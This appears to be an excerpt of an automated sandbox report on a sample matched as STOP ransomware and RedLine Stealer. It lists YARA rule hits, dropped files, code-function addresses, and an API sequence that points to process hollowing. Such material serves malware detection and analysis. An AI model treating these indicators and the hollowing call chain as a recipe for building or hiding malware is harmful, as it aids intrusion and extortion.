                Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 4_2_005B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_00401350 GetCurrentProcess,NtQueryInformationProcess
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDD7A13_2_00BDD7A1
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B987803_2_00B98780
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9A7103_2_00B9A710
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B927503_2_00B92750
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B967403_2_00B96740
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B968803_2_00B96880
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBC8043_2_00BBC804
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B969F33_2_00B969F3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDD9DC3_2_00BDD9DC
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD9A713_2_00BD9A71
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B92B803_2_00B92B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B96B803_2_00B96B80
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD3B403_2_00BD3B40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99CF93_2_00B99CF9
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BDACFF3_2_00BDACFF
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99DFA3_2_00B99DFA
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9BDC03_2_00B9BDC0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB7D6C3_2_00BB7D6C
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9DD403_2_00B9DD40
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B96EE03_2_00B96EE0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BBCE513_2_00BBCE51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BD9FE33_2_00BD9FE3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB0F303_2_00BB0F30
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B99F763_2_00B99F76
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004149FD4_2_004149FD
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040727D4_2_0040727D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0041421D4_2_0041421D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00413D484_2_00413D48
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0041152A4_2_0041152A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004145F14_2_004145F1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040D6584_2_0040D658
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00414E1D4_2_00414E1D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E08334_2_005E0833
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E00C34_2_005E00C3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B30F04_2_005B30F0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E04614_2_005E0461
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E0C1B4_2_005E0C1B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005DFC2E4_2_005DFC2E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B3D404_2_005B3D40
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004033A05_2_004033A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0043027B5_2_0043027B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042F28E5_2_0042F28E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004027505_2_00402750
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042F7235_2_0042F723
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042FAC15_2_0042FAC1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042FE935_2_0042FE93
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E88FCA5_2_61E88FCA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAD2AC5_2_61EAD2AC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4B8A15_2_61E4B8A1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E75F1F5_2_61E75F1F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E400655_2_61E40065
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9E24F5_2_61E9E24F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E625545_2_61E62554
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9A4A75_2_61E9A4A7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4E4BF5_2_61E4E4BF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E947835_2_61E94783
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E7A7905_2_61E7A790
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E187365_2_61E18736
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E866685_2_61E86668
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E586705_2_61E58670
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6667F5_2_61E6667F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA0BA95_2_61EA0BA9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E62CA35_2_61E62CA3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E98FE25_2_61E98FE2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E52F805_2_61E52F80
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA2F475_2_61EA2F47
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E56F185_2_61E56F18
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4CEF95_2_61E4CEF9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E1EEFF5_2_61E1EEFF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA91F65_2_61EA91F6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E651DD5_2_61E651DD
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9316A5_2_61E9316A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9F0ED5_2_61E9F0ED
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA70CF5_2_61EA70CF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9D0C35_2_61E9D0C3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E8D0B65_2_61E8D0B6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6904E5_2_61E6904E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4304E5_2_61E4304E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E153375_2_61E15337
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E672DC5_2_61E672DC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E192085_2_61E19208
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E534E35_2_61E534E3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E774525_2_61E77452
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E379305_2_61E37930
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E218165_2_61E21816
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9FBF05_2_61E9FBF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E55BD75_2_61E55BD7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA5B625_2_61EA5B62
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E91DC15_2_61E91DC1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6DDA55_2_61E6DDA5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E31DAB5_2_61E31DAB
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E95D7A5_2_61E95D7A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E5BC4C5_2_61E5BC4C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E25FA25_2_61E25FA2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E1DEC25_2_61E1DEC2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E69E8F5_2_61E69E8F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E89E0E5_2_61E89E0E
                Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe 26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe 26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                Source: sqlite3[1].dll.5.dr; Static PE information: Number of sections: 18 > 10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe; Section loaded: nss3.dll
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
